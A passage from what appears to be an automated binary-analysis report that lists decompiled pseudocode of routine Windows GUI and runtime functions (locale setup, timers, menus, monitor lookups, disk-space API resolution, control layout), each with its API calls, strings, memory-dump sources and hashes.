    void* _t86;
    void* _t87;
    intOrPtr _t90;

    _t89 = _t90;
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(_t90);
    _push(0x40bb1b);
    _push( *[fs:eax]);
    *[fs:eax] = _t90;
    _v8 = GetThreadLocale();
    _t53 = 1;
    _t86 = 0x465830;
    _t83 = 0x465860;
    do {
        _t3 = _t53 + 0x44; // 0x45
        E0040B9CC(_t3 - 1, _t53 - 1, &_v16, 0xb, _t89);
        E00404790(_t86, _v16);
        _t6 = _t53 + 0x38; // 0x39
        E0040B9CC(_t6 - 1, _t53 - 1, &_v20, 0xb, _t89);
        E00404790(_t83, _v20);
        _t53 = _t53 + 1;
        _t83 = _t83 + 4;
        _t86 = _t86 + 4;
    } while (_t53 != 0xd);
    _t54 = 1;
    _t87 = 0x465890;
    _t84 = 0x4658ac;
    do {
        _t8 = _t54 + 5; // 0x6
        asm("cdq");
        _v12 = _t8 % 7;
        E0040B9CC(_v12 + 0x31, _t54 - 1, &_v24, 6, _t89);
        E00404790(_t87, _v24);
        E0040B9CC(_v12 + 0x2a, _t54 - 1, &_v28, 6, _t89);
        E00404790(_t84, _v28);
        _t54 = _t54 + 1;
        _t84 = _t84 + 4;
        _t87 = _t87 + 4;
    } while (_t54 != 8);
    _pop(_t80);
    *[fs:eax] = _t80;
    _push(E0040BB22);
    return E00404760( &_v28, 4);
}


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000000,0040BB1B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040BA24
                                                                            Strings
                                                                            • w@ , xrefs: 0040BAB1
                                                                            • $x@ , xrefs: 0040BAD6
                                                                            • ,w@ , xrefs: 0040BA42
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: LocaleThread
                                                                            • String ID: $x@$,w@$w@
                                                                            • API String ID: 635194068-3772529897
                                                                            • Opcode ID: 190d255e8ff991ed6adefd9f30e002100e668f39c50ea463852dc53f0779f4e0
                                                                            • Instruction ID: ff42a5d57a33c53001075c18811d422212253fa3653e9f98a0f8edc246bfd2b8
                                                                            • Opcode Fuzzy Hash: 190d255e8ff991ed6adefd9f30e002100e668f39c50ea463852dc53f0779f4e0
                                                                            • Instruction Fuzzy Hash: E33178B1F005085BD704EA95D881BAF77A9DBC8314F65443BFA09E7381D73DAD0186AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
E004577C4(int __eax, void* __ebx, void* __edi, void* __esi) {
    int _v8;
    char _v9;
    char _v16;
    char _v20;
    intOrPtr _t39;
    long _t44;
    int _t59;
    void* _t70;
    intOrPtr _t74;
    intOrPtr* _t75;
    intOrPtr _t76;
    void* _t82;
    void* _t83;
    intOrPtr _t84;

    _t80 = __esi;
    _t79 = __edi;
    _t82 = _t83;
    _t84 = _t83 + 0xfffffff0;
    _push(__ebx);
    _push(__esi);
    _push(__edi);
    _v16 = 0;
    _v20 = 0;
    _v8 = __eax;
    _push(_t82);
    _push(0x457911);
    _push( *[fs:eax]);
    *[fs:eax] = _t84;
    _t63 = E00457738(_v8);
    if( *((char*)(_v8 + 0x88)) != 0) {
        _t59 = _v8;
        _t86 = *((intOrPtr*)(_t59 + 0x48));
        if( *((intOrPtr*)(_t59 + 0x48)) == 0) {
            E00457D90(_v8, 0, _t70);
        }
    }
    E00455250(_t63, &_v20);
    E00437730(_v20, 0, &_v16, _t86);
    _t39 = *0x466580; // 0x27bf470
    E004579C0(_t39, _v16, _t86);
    _v9 = 1;
    _push(_t82);
    _push(0x4578b8);
    _push( *[fs:eax]);
    *[fs:eax] = _t84;
    if( *((short*)(_v8 + 0x12a)) != 0) {
        _t63 = _v8;
        *((intOrPtr*)(_v8 + 0x128))();
    }
    if(_v9 != 0) {
        _t24 = _v8 + 0xc0; // 0xbea6e800
        _t63 = *_t24;
        if(_t63 > 0) {
            __eflags = *0x4665a0;
            if( *0x4665a0 == 0) {
                *0x4665a0 = SetTimer(0, 0, _t63, E0045775C);
                __eflags = *0x4665a0;
                if( *0x4665a0 == 0) {
                    E004576D4();
                }
            }
        } else {
            E004576D4();
        }
    }
    _pop(_t74);
    *[fs:eax] = _t74;
    _t44 = GetCurrentThreadId();
    _t75 = *0x462f38; // 0x463034
    if(_t44 == *_t75 && E0042048C(0, _t63, _t79, _t80) != 0) {
        _v9 = 0;
    }
    if(_v9 != 0) {
        WaitMessage();
    }
    _pop(_t76);
    *[fs:eax] = _t76;
    _push(E00457918);
    return E00404760( &_v20, 2);
}


                                                                            APIs
                                                                              • Part of subcall function 00457738: GetCursorPos.USER32 ref: 0045773F
                                                                            • SetTimer.USER32 ref: 00457893
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004578CD
                                                                            • WaitMessage.USER32(00000000,00457911,?,?,?,00460C02), ref: 004578F1
                                                                            Strings
                                                                            • 40F , xrefs: 004578D2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CurrentCursorMessageThreadTimerWait
                                                                            • String ID: 40F
                                                                            • API String ID: 3909455694-2631550472
                                                                            • Opcode ID: 024d60afcb6fa436a8515f78470afffda0a18e1312202335da47132cbf8f2364
                                                                            • Instruction ID: e89649fe14110faf48328d87229489a930fd8d9713066124e3e3ff92809c3fcb
                                                                            • Opcode Fuzzy Hash: 024d60afcb6fa436a8515f78470afffda0a18e1312202335da47132cbf8f2364
                                                                            • Instruction Fuzzy Hash: 0E419330A08204AFDB11EBA4E886B9E77F5EF04315F6144BAEC0097393D7786E48CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
E0043394C(intOrPtr* __eax) {
    struct tagMENUITEMINFOA _v128;
    intOrPtr _v132;
    int _t16;
    intOrPtr* _t29;
    struct HMENU__* _t36;
    MENUITEMINFOA* _t37;

    _t37 = &_v128;
    _t29 = __eax;
    _t16 = *0x462f3c; // 0x4658c8
    if( *((char*)(_t16 + 0xd)) != 0 && *((intOrPtr*)(__eax + 0x38)) != 0) {
        _t36 = *((intOrPtr*)( *__eax + 0x34))();
        _t37->cbSize = 0x2c;
        _v132 = 0x10;
        _v128.hbmpUnchecked = &(_v128.cch);
        _v128.dwItemData = 0x50;
        _t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
        if(_t16 != 0) {
            _t16 = E00433CE0(_t29);
            asm("sbb edx, edx");
            if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                _v128.cbSize = ((E00433CE0(_t29) & 0x0000007f) << 0x0000000d) + ((E00433CE0(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                _v132 = 0x10;
                _t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                if(_t16 != 0) {
                    return DrawMenuBar( *(_t29 + 0x38));
                }
            }
        }
    }
    return _t16;
}


                                                                            APIs
                                                                            • GetMenuItemInfoA.USER32 ref: 0043399A
                                                                            • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 004339EC
                                                                            • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 004339F9
                                                                            Strings
                                                                            • P , xrefs: 0043398C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$InfoItem$Draw
                                                                            • String ID: P
                                                                            • API String ID: 3227129158-3110715001
                                                                            • Opcode ID: fa58c7a9b2e32d2e266c9545e896ff45175c2863883d5026e0fe250c8b0133d9
                                                                            • Instruction ID: 1a0cb4ff114c7cd32e92c9fa77bceba14735dfb38598f85aa0acc494823d54c1
                                                                            • Opcode Fuzzy Hash: fa58c7a9b2e32d2e266c9545e896ff45175c2863883d5026e0fe250c8b0133d9
                                                                            • Instruction Fuzzy Hash: EF11C470605210AFD310DF29CC85B4B76D4AF88366F149669F094D73E9D77DC984C78A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
E00422F78(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t15;
    void* _t16;
    intOrPtr _t18;
    signed int _t19;
    void* _t20;
    intOrPtr _t21;

    _t19 = _a12;
    if( *0x46633b != 0) {
        _t16 = 0;
        if((_t19 & 0x00000003) != 0) {
            L7:
            _t16 = 0x12340042;
        } else {
            _t21 = _a4;
            if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                goto L7;
            }
        }
    } else {
        _t18 = *0x46631c; // 0x422f78
        *0x46631c = E00422CE4(3, _t15, _t18, _t19, _t20);
        _t16 = *0x46631c(_a4, _a8, _t19);
    }
    return _t16;
}


                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 00422FC6
                                                                            • GetSystemMetrics.USER32 ref: 00422FD8
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • x/B , xrefs: 00422F8F, 00422F9C, 00422FA8
                                                                            • MonitorFromPoint , xrefs: 00422F8A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$AddressProc
                                                                            • String ID: MonitorFromPoint$x/B
                                                                            • API String ID: 1792783759-3362865607
                                                                            • Opcode ID: 44c87fef4cfb7df56709ba947901e1d111c4d3eb60895fa92bde7c443fd75764
                                                                            • Instruction ID: 8c996490f865ef833d6f29e33133d28ea07156a354397cb3f82660790c2b9ebf
                                                                            • Opcode Fuzzy Hash: 44c87fef4cfb7df56709ba947901e1d111c4d3eb60895fa92bde7c443fd75764
                                                                            • Instruction Fuzzy Hash: 5D01DF313001247BDB009F05EE44B5ABB60E710314FC28037FC049A3A0D3F98C81EBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
E00422E50(intOrPtr* _a4, signed int _a8) {
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    intOrPtr* _t14;
    intOrPtr _t16;
    signed int _t17;
    void* _t18;
    void* _t19;

    _t17 = _a8;
    _t14 = _a4;
    if( *0x46633a != 0) {
        _t19 = 0;
        if((_t17 & 0x00000003) != 0 || *((intOrPtr*)(_t14 + 8)) > 0 && *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) > *_t14 && GetSystemMetrics(1) > *((intOrPtr*)(_t14 + 4))) {
            _t19 = 0x12340042;
        }
    } else {
        _t16 = *0x466318; // 0x422e50
        *0x466318 = E00422CE4(2, _t14, _t16, _t17, _t18);
        _t19 = *0x466318(_t14, _t17);
    }
    return _t19;
}


                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 00422EA1
                                                                            • GetSystemMetrics.USER32 ref: 00422EAD
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • MonitorFromRect , xrefs: 00422E65
                                                                            • P.B , xrefs: 00422E6A, 00422E77, 00422E7E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$AddressProc
                                                                            • String ID: MonitorFromRect$P.B
                                                                            • API String ID: 1792783759-2213800761
                                                                            • Opcode ID: d1312910f7091c19559ba0fe7ce2875f1198a4a289036ac6f49b1dab6c252c78
                                                                            • Instruction ID: 344e9d6dab49e3fdbc3704bf19803c74fdffa6d0553f2af2d0679323b2ac8f6f
                                                                            • Opcode Fuzzy Hash: d1312910f7091c19559ba0fe7ce2875f1198a4a289036ac6f49b1dab6c252c78
                                                                            • Instruction Fuzzy Hash: 37018B32700224BBDB208B04EA85B1AB758F740724F868462FC04CA342C3F89C80DBFA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E0040D85C() {
                                                                                _Unknown_base(*)()* _t1;
                                                                                struct HINSTANCE__* _t3;

                                                                                _t1 = GetModuleHandleA("kernel32.dll");
                                                                                _t3 = _t1;
                                                                                if(_t3 != 0) {
                                                                                    _t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                    *0x46182c = _t1;
                                                                                }
                                                                                if( *0x46182c == 0) {
                                                                                    *0x46182c = E00408F94;
                                                                                    return E00408F94;
                                                                                }
                                                                                return _t1;
                                                                            }

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0046010B,00000000,0046011E), ref: 0040D862
                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040D873
                                                                            Strings
                                                                            • kernel32.dll , xrefs: 0040D85D
                                                                            • GetDiskFreeSpaceExA , xrefs: 0040D86D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                            • API String ID: 1646373207-3712701948
                                                                            • Opcode ID: 2e2f4f89079191d4818a05b952f3a92a1b3673e8b5a347ee851826118ffcadc1
                                                                            • Instruction ID: f92f8e55d4f3d77ad231ec8b499964c1603e405444d36c9258ecd07ec0a69fbb
                                                                            • Opcode Fuzzy Hash: 2e2f4f89079191d4818a05b952f3a92a1b3673e8b5a347ee851826118ffcadc1
                                                                            • Instruction Fuzzy Hash: 30D09EE6A003519EEB11BBF65881A2636D49B14308B18843BE151B62E2E7FDC818CF9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                                                                                  E0043D9E0(signed int __eax, int* __ecx, void* __edx, char _a4, intOrPtr* _a8, void* _a12, signed int _a16) { 				signed int _v8; 				signed int _v12; 				signed int _v16; 				signed int _v20; 				signed int _v24; 				char _v40; 				signed int _t170; 				signed int _t181; 				void* _t194; 				void* _t198; 				int _t218; 				int _t223; 				int _t228; 				signed int _t229; 				void* _t237; 				signed int _t238; 				int* _t244; 				signed int _t274; 				signed int _t276; 				signed int _t278; 				void* _t284; 				intOrPtr* _t290; 				void* _t292; 				void* _t302; 				void* _t304;  				_t170 = __eax; 				asm("movsd"); 				asm("movsd"); 				asm("movsd"); 				asm("movsd"); 				_t244 = __ecx; 				_t292 = __edx; 				_v8 = __eax; 				_t290 = _a8; 				if(_a16 == 0) { 					L2: 					if( *(_t292 + 0x175) == 0 ||  *(_t292 + 0x179) == 0) { 						L30: 						if(_a16 == 0) { 							L55: 							return _t170; 						} 						L31: 						_v20 =  *((intOrPtr*)(_t290 + 8)) -  *_t290; 						if(_v20 < 0) { 							L34: 							_v20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 							L35: 							_v24 =  *((intOrPtr*)(_t290 + 0xc)) -  *((intOrPtr*)(_t290 + 4)); 							if(_v24 < 0) { 								L38: 								_v24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 								L39: 								_v12 =  *_t290; 								_v16 =  *((intOrPtr*)(_t290 + 4)); 								_t181 = _a16 & 0x000000ff; 								if(_t181 > 6) { 									L46: 									E00447BB8( *((intOrPtr*)(_t292 + 0x78)), _v12, 1, _v24, _v20); 									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))() != _v20) { 										L48: 										_t170 = _a16 & 0x000000ff; 										if(_t170 > 5) { 											goto L55; 										} 										switch( *((intOrPtr*)(_t170 * 4 +  &M0043DD0B))) { 											case 0: 												goto L55; 											case 1: 												
_t189 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 												 *((intOrPtr*)(_t290 + 4)) =  *((intOrPtr*)(_t290 + 4)) - _v24 - _t189; 												return _t189; 											case 2: 												__edx = 3; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v24 = _v24 - __eax; 												 *(__edi + 0xc) =  *(__edi + 0xc) + _v24 - __eax; 												return __eax; 											case 3: 												__edx = 2; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v20 = _v20 - __eax; 												 *__edi =  *__edi - _v20 - __eax; 												return __eax; 											case 4: 												__edx = 2; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v20 = _v20 - __eax; 												 *(__edi + 8) =  *(__edi + 8) + _v20 - __eax; 												return __eax; 											case 5: 												__edx = 2; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v20 = _v20 - __eax; 												 *(__edi + 8) =  *(__edi + 8) + _v20 - __eax; 												__edx = 3; 												__eax =  *(__esi + 0x78); 												__ecx =  *( *(__esi + 0x78)); 												__eax =  *((intOrPtr*)( *( *(__esi + 0x78)) + 0x10))(); 												_v24 = _v24 - __eax; 												_t168 = __edi + 0xc; 												 *_t168 =  *(__edi + 0xc) + _v24 - __eax; 												__eflags =  *_t168; 												return __eax; 										} 									} 									_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 									if(_t170 == _v24) { 										goto L55; 									} 									goto L48; 								} 								switch( *((intOrPtr*)(_t181 * 4 +  &M0043DC43))) { 			
						case 0: 										goto L46; 									case 1: 										 *((intOrPtr*)(_t290 + 4)) =  *((intOrPtr*)(_t290 + 4)) + _v24; 										goto L46; 									case 2: 										__eax = _v24; 										 *(__edi + 0xc) =  *(__edi + 0xc) - _v24; 										__eax =  *(__edi + 0xc); 										_v16 = __eax; 										goto L46; 									case 3: 										__eax = _v20; 										 *__edi =  *__edi + __eax; 										goto L46; 									case 4: 										__eax = _v20; 										 *(__edi + 8) =  *(__edi + 8) - _v20; 										__eax =  *(__edi + 8); 										_v12 = __eax; 										goto L46; 									case 5: 										__eax =  *(__esi + 0x40); 										_v12 =  *(__esi + 0x40); 										__eax =  *(__esi + 0x44); 										_v16 =  *(__esi + 0x44); 										__eax =  &_v16; 										_push( &_v16); 										__eax =  &_v20; 										_push( &_v20); 										__eax =  &_v24; 										_push( &_v24); 										_push(__edi); 										__eax =  &_v40; 										_push( &_v40); 										__ecx =  &_v12; 										__edx = __esi; 										__eax = _v8; 										__eax =  *((intOrPtr*)( *_v8 + 0xac))(); 										goto L46; 								} 							} 							_t194 = (_a16 & 0x000000ff) - 0xffffffffffffffff; 							if(_t194 < 0 || _t194 == 3) { 								goto L38; 							} else { 								goto L39; 							} 						} 						_t198 = (_a16 & 0x000000ff) + 0xfd - 2; 						if(_t198 < 0 || _t198 == 1) { 							goto L34; 						} else { 							goto L35; 						} 					} else { 						_v12 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 						_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 						_v20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 						_v24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); 						if(( *(_t292 + 0x61) & 0x00000004) == 0) { 							__eflags =  *(_t292 + 0x61) & 0x00000001; 							if(__eflags == 0) { 								_t238 = _t237 - _t284; 								__eflags = _t238; 								_v12 = _t238; 
							} 						} else { 							if(( *(_t292 + 0x61) & 0x00000001) == 0) { 								_v12 =  *_t244 -  *(_t292 + 0x175) -  *((intOrPtr*)(_t292 + 0x165)); 							} else { 								_v20 =  *_t244 -  *(_t292 + 0x175) -  *((intOrPtr*)(_t292 + 0x165)); 							} 						} 						if(( *(_t292 + 0x61) & 0x00000008) == 0) { 							__eflags =  *(_t292 + 0x61) & 0x00000002; 							if(__eflags == 0) { 								_t228 = MulDiv( *(_t292 + 0x169), _t244[1],  *(_t292 + 0x179)); 								_t278 = _v24 >> 1; 								if(__eflags < 0) { 									asm("adc edx, 0x0"); 								} 								_t229 = _t228 - _t278; 								__eflags = _t229; 								_v16 = _t229; 							} 						} else { 							if(( *(_t292 + 0x61) & 0x00000002) == 0) { 								_v16 = _t244[1] -  *(_t292 + 0x179) -  *(_t292 + 0x169); 							} else { 								_v24 = _t244[1] -  *(_t292 + 0x179) -  *(_t292 + 0x169); 							} 						} 						if(_a4 != 0) { 							_t302 = ( *0x43ddb8 & 0x000000ff) - ( *0x43ddb4 & 0x000000ff &  *(_t292 + 0x61)); 							if(_t302 != 0) { 								_t223 = MulDiv( *(_t292 + 0x16d),  *_t244,  *(_t292 + 0x175)); 								_t276 = _v20 >> 1; 								if(_t302 < 0) { 									asm("adc edx, 0x0"); 								} 								_v12 = _t223 - _t276; 							} 							_t304 = ( *0x43ddb8 & 0x000000ff) - ( *0x43ddbc & 0x000000ff &  *(_t292 + 0x61)); 							if(_t304 != 0) { 								_t218 = MulDiv( *(_t292 + 0x171), _t244[1],  *(_t292 + 0x179)); 								_t274 = _v24 >> 1; 								if(_t304 < 0) { 									asm("adc edx, 0x0"); 								} 								_v16 = _t218 - _t274; 							} 						} 						_t170 = E00447BB8( *((intOrPtr*)(_t292 + 0x78)), _v12, 1, _v24, _v20); 						goto L30; 					} 				} 				_t7 = (_a16 & 0x000000ff) + 0x462568; // 0xb0d0703 				_t170 =  *_t7 & 0x000000ff; 				if(_t170 ==  *((intOrPtr*)(__edx + 0x61))) { 					goto L31; 				} 				goto L2; 			}                        

                                                                            APIs
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0043DB5F
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043DB9A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac93a01106b9b8afdc737577d4b32e1d48ec0ca0db69446e1e7388fe02ce81ee
                                                                            • Instruction ID: 362d5403a1925025f21cd0c7a8b8993e4e77c4d1e46d8b923cef89c0b287574d
                                                                            • Opcode Fuzzy Hash: ac93a01106b9b8afdc737577d4b32e1d48ec0ca0db69446e1e7388fe02ce81ee
                                                                            • Instruction Fuzzy Hash: 89D16870A04A059FDB11CF69C484AAABBF6FF89300F24895AE856DB754C738FD41CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
E00438594(intOrPtr* __eax, signed int __edx) {
    intOrPtr _v16;
    char _v20;
    char _v24;
    char _v28;
    intOrPtr _t51;
    intOrPtr _t52;
    intOrPtr _t55;
    intOrPtr _t56;
    intOrPtr _t57;
    intOrPtr _t58;
    intOrPtr* _t62;
    intOrPtr* _t64;
    struct HICON__* _t67;
    intOrPtr _t69;
    intOrPtr* _t74;
    intOrPtr _t76;
    intOrPtr* _t77;
    intOrPtr* _t79;
    intOrPtr _t82;
    intOrPtr _t84;
    intOrPtr _t86;
    intOrPtr _t88;
    intOrPtr _t89;
    struct HWND__* _t92;
    intOrPtr _t93;
    intOrPtr _t95;
    intOrPtr _t96;
    intOrPtr* _t98;
    intOrPtr _t102;
    intOrPtr _t105;
    intOrPtr _t107;
    intOrPtr _t108;
    intOrPtr _t109;
    intOrPtr _t111;
    struct HWND__* _t112;
    intOrPtr _t113;
    intOrPtr _t115;
    intOrPtr _t119;
    intOrPtr* _t122;
    intOrPtr _t123;
    void* _t137;
    intOrPtr _t141;
    intOrPtr _t147;
    void* _t163;
    char _t164;
    intOrPtr _t166;
    void* _t173;
    void* _t174;

    _t122 = __eax;
    if( *0x466530 != 0) {
        L3:
        _t51 =  *0x466510; // 0x0
        _t52 =  *0x466510; // 0x0
        _t166 = E00438468(_t122,  *(_t52 + 0x8f) & 0x000000ff,  &_v28, _t51);
        if( *0x466530 == 0) {
            _t176 =  *0x466534;
            if( *0x466534 != 0) {
                _t111 =  *0x466524; // 0x0
                _t112 = GetDesktopWindow();
                _t113 =  *0x466534; // 0x0
                E00443F74(_t113, _t112, _t176, _t111);
            }
        }
        _t55 =  *0x466510; // 0x0
        if( *((char*)(_t55 + 0x8f)) != 0) {
            __eflags =  *0x466530;
            _t6 =  &_v24;
             *_t6 =  *0x466530 != 0;
            __eflags =  *_t6;
             *0x466530 = 2;
        } else {
             *0x466530 = 1;
            _v24 = 0;
        }
        _t56 =  *0x466514; // 0x0
        if(_t166 ==  *((intOrPtr*)(_t56 + 8))) {
            L12:
            _t57 =  *0x466514; // 0x0
             *((intOrPtr*)(_t57 + 0x10)) =  *_t122;
             *((intOrPtr*)(_t57 + 0x14)) =  *((intOrPtr*)(_t122 + 4));
            _t58 =  *0x466514; // 0x0
            if( *((intOrPtr*)(_t58 + 8)) != 0) {
                _t102 =  *0x466514; // 0x0
                E0043A55C( *((intOrPtr*)(_t102 + 8)),  &_v20, _t122);
                _t105 =  *0x466514; // 0x0
                 *((intOrPtr*)(_t105 + 0x18)) = _v20;
                 *((intOrPtr*)(_t105 + 0x1c)) = _v16;
            }
            _t137 = E004384B8(2);
            _t62 =  *0x466514; // 0x0
            _t163 =  *((intOrPtr*)( *_t62 + 4))( *((intOrPtr*)(_t122 + 4)));
            if( *0x466534 == 0) {
                L22:
                _t64 =  *0x462f14; // 0x466584
                _t67 = SetCursor(E00454B00( *_t64, _t163));
                if( *0x466530 != 2) {
                    goto L34;
                }
                _t188 = _t166;
                if(_t166 != 0) {
                    _t164 = E004384F4();
                    _t69 =  *0x466514; // 0x0
                     *((intOrPtr*)(_t69 + 0x60)) = _t164;
                    __eflags = _t164;
                    if(__eflags != 0) {
                        E0043A55C(_t164,  &_v24, _t122);
                        _t67 = E00403B24(_t164, __eflags);
                        _t141 =  *0x466514; // 0x0
                         *(_t141 + 0x5c) = _t67;
                    } else {
                        _t82 =  *0x466514; // 0x0
                        _t67 = E00403B24( *((intOrPtr*)(_t82 + 8)), __eflags);
                        _t147 =  *0x466514; // 0x0
                         *(_t147 + 0x5c) = _t67;
                    }
                } else {
                    _push( *((intOrPtr*)(_t122 + 4)));
                    _t84 =  *0x466514; // 0x0
                    _t67 = E00403B24( *((intOrPtr*)(_t84 + 0x40)), _t188);
                }
                if( *0x466514 == 0) {
                    goto L34;
                } else {
                    _t123 =  *0x466514; // 0x0
                    _t42 = _t123 + 0x64; // 0x64
